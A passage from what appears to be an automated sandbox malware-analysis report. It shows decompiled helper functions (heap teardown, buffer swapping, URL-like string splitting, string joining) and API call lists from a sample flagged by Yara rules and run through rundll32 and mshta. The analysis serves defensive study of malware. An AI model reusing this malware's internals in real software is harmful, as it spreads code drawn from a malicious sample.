                                						continue; /* keep polling until the flag clears or the budget is spent */
                                					}
                                					break;
                                				}
                                				_t6 =  *0x343a30c; // 0x2cc
                                				if(_t6 != 0) {
                                					CloseHandle(_t6); /* release the event handle */
                                				}
                                				_t7 =  *0x343a2d8; // 0x51f0000  (global private heap)
                                				if(_t7 != 0) {
                                					HeapDestroy(_t7); /* tear down the private heap */
                                				}
                                				goto L8;
                                			}


                                APIs
                                • SetEvent.KERNEL32(000002CC,00000001,03435E70), ref: 03437612
                                • SleepEx.KERNEL32(00000064,00000001), ref: 03437621
                                • CloseHandle.KERNEL32(000002CC), ref: 03437642
                                • HeapDestroy.KERNEL32(051F0000), ref: 03437652
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 5289e33d020ca8ae77e52003e11f8c7168056c1b00c6b97d75c07343de836de3
                                • Instruction ID: c1eb660eabac5439aba18bed15e6dbebb7c9621ebfe9589317d3af4400234d76
                                • Opcode Fuzzy Hash: 5289e33d020ca8ae77e52003e11f8c7168056c1b00c6b97d75c07343de836de3
                                • Instruction Fuzzy Hash: A4F030B5AC131297DB10FB39989CB873BE8AB19771B080511BD91FF3D9CB60C444D964
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 03490B35
                                • Sleep.KERNEL32(0000000A), ref: 03490B3F
                                • HeapFree.KERNEL32(00000000), ref: 03490B6D
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03490B82
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0

                                C-Code - Quality: 37%
                                			E034372C7() {
                                				void* _v0;
                                				void** _t1;  // temporary left undeclared by the decompiler
                                				void** _t3;
                                				void** _t5;
                                				void** _t7;
                                				void** _t8;
                                				void* _t10;
                                
                                				// *0x343a3cc points to a shared state block: the critical section sits at index 0x10,
                                				// a busy flag at index 0x16 and the current buffer pointer at index 0.
                                				_t3 =  *0x343a3cc; // 0x55e95b0
                                				RtlEnterCriticalSection( &(_t3[0x10])); // unresolved import, named from the APIs list below (ref 034372D0)
                                				while(1) {
                                					_t5 =  *0x343a3cc; // 0x55e95b0
                                					_t1 =  &(_t5[0x16]); // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa); // poll every 10 ms until the busy flag clears
                                				}
                                				_t7 =  *0x343a3cc; // 0x55e95b0
                                				_t10 =  *_t7;
                                				if(_t10 != 0 && _t10 != 0x343b827) {
                                					HeapFree( *0x343a2d8, 0, _t10); // release the old buffer unless it is the built-in default at 0x343b827
                                					_t7 =  *0x343a3cc; // 0x55e95b0
                                				}
                                				 *_t7 = _v0; // install the replacement; _v0 is never assigned above, so it comes from the caller's stack frame
                                				_t8 =  &(_t7[0x10]);
                                				RtlLeaveCriticalSection(_t8); // unresolved import, named from the APIs list below (ref 0343731D)
                                				return _t8;
                                			}

                                APIs
                                • RtlEnterCriticalSection.NTDLL(055E9570), ref: 034372D0
                                • Sleep.KERNEL32(0000000A), ref: 034372DA
                                • HeapFree.KERNEL32(00000000), ref: 03437308
                                • RtlLeaveCriticalSection.NTDLL(055E9570), ref: 0343731D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0

                                APIs
                                • memset.NTDLL ref: 0348095D
                                • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,0347C1F8,00000000), ref: 034809AB
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,03491616,00000000,0347C1F8,0348E6A0,00000000,0347C1F8,034800C3,00000000,0347C1F8,0347306D,00000000), ref: 03480CB6
                                • GetLastError.KERNEL32(?,00000000,?), ref: 03480FB8
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseErrorFreeHandleHeapLastmemset
                                • String ID:
                                • API String ID: 2333114656-0

                                APIs
                                  • Part of subcall function 0348D698: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D6F2
                                  • Part of subcall function 0348D698: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D710
                                  • Part of subcall function 0348D698: RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0348D73C
                                  • Part of subcall function 0348D698: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D753
                                  • Part of subcall function 0348D698: HeapFree.KERNEL32(00000000,00000000), ref: 0348D766
                                  • Part of subcall function 0348D698: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,03471785,?,?,?,?,?), ref: 0348D775
                                • GetLastError.KERNEL32 ref: 034717EE
                                  • Part of subcall function 03483BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03483C58
                                  • Part of subcall function 03483BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03483C7C
                                  • Part of subcall function 03483BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,034717D6,?,?,?,?,?,?,?), ref: 03483C8A
                                • HeapFree.KERNEL32(00000000,?), ref: 0347180A
                                • HeapFree.KERNEL32(00000000,?), ref: 0347181B
                                • SetLastError.KERNEL32(00000000), ref: 0347181E
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                • String ID:
                                • API String ID: 2451549186-0

                                APIs
                                  • Part of subcall function 034863D1: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?,?), ref: 034863F5
                                  • Part of subcall function 034863D1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 03486407
                                  • Part of subcall function 034863D1: wcstombs.NTDLL ref: 03486415
                                  • Part of subcall function 034863D1: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?), ref: 03486439
                                  • Part of subcall function 034863D1: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0348644E
                                  • Part of subcall function 034863D1: mbstowcs.NTDLL ref: 0348645B
                                  • Part of subcall function 034863D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?,?,?), ref: 0348646D
                                  • Part of subcall function 034863D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0347A7C4,?,?,?,?,?), ref: 03486487
                                • GetLastError.KERNEL32 ref: 0347A82D
                                  • Part of subcall function 03483BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03483C58
                                  • Part of subcall function 03483BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03483C7C
                                  • Part of subcall function 03483BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,034717D6,?,?,?,?,?,?,?), ref: 03483C8A
                                • HeapFree.KERNEL32(00000000,?), ref: 0347A849
                                • HeapFree.KERNEL32(00000000,?), ref: 0347A85A
                                • SetLastError.KERNEL32(00000000), ref: 0347A85D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                • String ID:
                                • API String ID: 3867366388-0

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?,?,00000000), ref: 0347D435
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                  • Part of subcall function 03492DE3: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,0347D463,00000000,00000001,00000001,?,?,0348DD0F,00000000,00000000,00000004,00000000), ref: 03492DF1
                                  • Part of subcall function 03492DE3: StrChrA.SHLWAPI(?,0000003F,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?,?,00000000,03473EC6,?), ref: 03492DFB
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?), ref: 0347D493
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0347D4A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0347D4AF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0

                                C-Code - Quality: 58%
                                			E034345C4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                				intOrPtr* _v8;
                                				int _t2;  // temporaries left undeclared by the decompiler
                                				void* _t17;
                                				intOrPtr* _t22;
                                				intOrPtr* _t26;
                                				void* _t27;
                                				void* _t28;
                                				char* _t30;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t37;
                                				void* _t39;
                                				int _t42;
                                
                                				// Splits the string at _a4 into two heap copies: the part before the first '/' or '?'
                                				// (written to *_a8) and the remainder starting at that character (written to *_a12).
                                				// E03436D63 allocates from the heap and E03437A57 searches for '/' and '?' (see the subcall list below).
                                				_t37 = 0;
                                				_t17 = lstrlen(_a4); // result returned in eax; unresolved import, named from the APIs list below (ref 034345D0)
                                				_t2 = _t17 + 1; // 0x1
                                				_t28 = _t2;
                                				_t34 = E03436D63(_t2); // buffer for the left part, lstrlen + 1 bytes
                                				if(_t34 != 0) {
                                					_t30 = E03436D63(_t28); // buffer for the right part, same size
                                					if(_t30 == 0) {
                                						E03436C2C(_t34); // second allocation failed; E03436C2C (not resolved on this page) is applied to the first buffer, presumably to free it
                                					} else {
                                						_t39 = _a4;
                                						_t22 = E03437A57(_t39); // first '/' or '?' in the input, or 0 if none
                                						_v8 = _t22;
                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                							_a4 = _t39;
                                						} else {
                                							// the delimiter is doubled (e.g. "//"): skip both characters and search again from there
                                							_t26 = _t22 + 2;
                                							_a4 = _t22 + 2;
                                							_t22 = E03437A57(_t26);
                                							_v8 = _t22;
                                						}
                                						if(_t22 == 0) {
                                							lstrcpy(_t34, _a4); // no delimiter: the whole input is the left part (ref 0343464A)
                                							 *_t30 = 0x2f; // right part defaults to "/"
                                							 *((char*)(_t30 + 1)) = 0;
                                						} else {
                                							_t42 = _t22 - _a4;
                                							memcpy(_t34, _a4, _t42); // left part up to the delimiter
                                							 *((char*)(_t34 + _t42)) = 0;
                                							lstrcpy(_t30, _v8); // right part from the delimiter onward (ref 0343463E)
                                						}
                                						 *_a8 = _t34;
                                						_t37 = 1;
                                						 *_a12 = _t30;
                                					}
                                				}
                                				return _t37;
                                			}

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,03436973,?,?,?,?,00000102,034337A0,?,?,76CC81D0), ref: 034345D0
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                  • Part of subcall function 03437A57: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,034345FE,00000000,00000001,00000001,?,?,03436973,?,?,?,?,00000102), ref: 03437A65
                                  • Part of subcall function 03437A57: StrChrA.SHLWAPI(?,0000003F,?,?,03436973,?,?,?,?,00000102,034337A0,?,?,76CC81D0,00000000), ref: 03437A6F
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03436973,?,?,?,?,00000102,034337A0,?), ref: 0343462E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0343463E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0343464A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0

                                C-Code - Quality: 100%
                                			E034328C4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                				void* _v8;
                                				int _t10;  // temporary left undeclared by the decompiler
                                				void* _t18;
                                				int _t25;
                                				int _t29;
                                				int _t34;
                                
                                				// Concatenates two wide strings into a fresh heap buffer (E03436D63 wraps RtlAllocateHeap, see the subcall list below).
                                				_t29 = lstrlenW(_a4);
                                				_t25 = lstrlenW(_a8);
                                				_t18 = E03436D63(_t25 + _t29 + _t25 + _t29 + 2); // 2 * (len1 + len2) bytes plus the wide NUL terminator
                                				_v8 = _t18;
                                				if(_t18 != 0) {
                                					_t34 = _t29 + _t29; // byte length of the first string
                                					memcpy(_t18, _a4, _t34);
                                					_t10 = _t25 + 2; // 0x2
                                					memcpy(_v8 + _t34, _a8, _t25 + _t10); // second string plus its terminator: 2 * len2 + 2 bytes
                                				}
                                				return _v8; // joined string, or 0 if the allocation failed
                                			}

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,76C85520,00000008,055E93F4,?,034321EB,004F0053,055E93F4,?,?,?,?,?,?,034366BE), ref: 034328D4
                                • lstrlenW.KERNEL32(034321EB,?,034321EB,004F0053,055E93F4,?,?,?,?,?,?,034366BE), ref: 034328DB
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • memcpy.NTDLL(00000000,004F0053,76C869A0,?,?,034321EB,004F0053,055E93F4,?,?,?,?,?,?,034366BE), ref: 034328FB
                                • memcpy.NTDLL(76C869A0,034321EB,00000002,00000000,004F0053,76C869A0,?,?,034321EB,004F0053,055E93F4), ref: 0343290E
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0

                                APIs
                                • lstrlen.KERNEL32(69B25F44,?,?,00000000,03485F22,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 034881A4
                                • lstrlen.KERNEL32(?,?,?,?), ref: 034881A9
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 034881C5
                                • lstrcpy.KERNEL32(00000000,?), ref: 034881E3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                • String ID:
                                • API String ID: 1697500751-0

                                APIs
                                • lstrlen.KERNEL32(06168560,76C85520,76CC81D0,773BEEF0,0347E873,?), ref: 03478DD7
                                • lstrlen.KERNEL32(?), ref: 03478DDF
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpy.KERNEL32(00000000,06168560), ref: 03478DF3
                                • lstrcat.KERNEL32(00000000,?), ref: 03478DFE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: b49ddc79b448babc68893eb5656023f53b8aaa49e96f44e1e7033b600444be40
                                • Instruction ID: cbbf5bcf5dd37cfe4665a871941c7323a6f3747d43d8ddaefc6cb1e0de4a0ad6
                                • Opcode Fuzzy Hash: b49ddc79b448babc68893eb5656023f53b8aaa49e96f44e1e7033b600444be40
                                • Instruction Fuzzy Hash: BCE09233501220AB8712ABE4AC4CC9FBBECEF9A6643150857F600EB104C72188008BE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(055E9B68,00000000,00000000,00000000,03435902,00000000), ref: 0343394C
                                • lstrlen.KERNEL32(?), ref: 03433954
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • lstrcpy.KERNEL32(00000000,055E9B68), ref: 03433968
                                • lstrcat.KERNEL32(00000000,?), ref: 03433973
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 0b2d814cda0fb252027b562a25576111f261a76f6dac3afae13f26f5ceea1f23
                                • Instruction ID: 918e841e2d6a375eacb85c5574459f33192277d5335a6eeeb5bd4ec89716e65a
                                • Opcode Fuzzy Hash: 0b2d814cda0fb252027b562a25576111f261a76f6dac3afae13f26f5ceea1f23
                                • Instruction Fuzzy Hash: 99E09233901621AB8711ABA4AC88D9FBBFCEF89661705041BFA00EB104C765D8018BE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000011.00000003.360151113.0000014C886A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014C886A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_3_14c886a0000_mshta.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 31d9662255b7f249616ceadde9cc10f7be338c06862ab3e0198782b9ef533960
                                • Instruction ID: a9d6b4a1fe6c0952fc9b9cab8f30323c4ecc5df30ff01e9d3557a939d4452d17
                                • Opcode Fuzzy Hash: 31d9662255b7f249616ceadde9cc10f7be338c06862ab3e0198782b9ef533960
                                • Instruction Fuzzy Hash: 51B092044ABA828ED60212721C6529A2AA0AA47218FC919D68445D50A2E00C05895262
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000011.00000003.360151113.0000014C886A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000014C886A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_3_14c886a0000_mshta.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                • Instruction ID: f046a1e83f21cc344bb135c910e8e18a3d6088bfff585731ff1350c0063e4863
                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                • Instruction Fuzzy Hash: 909002144D640795D45411911C4529D50806388354FD448A08816A0554D44D029611A3
                                Uniqueness

                                Uniqueness Score: -1.00%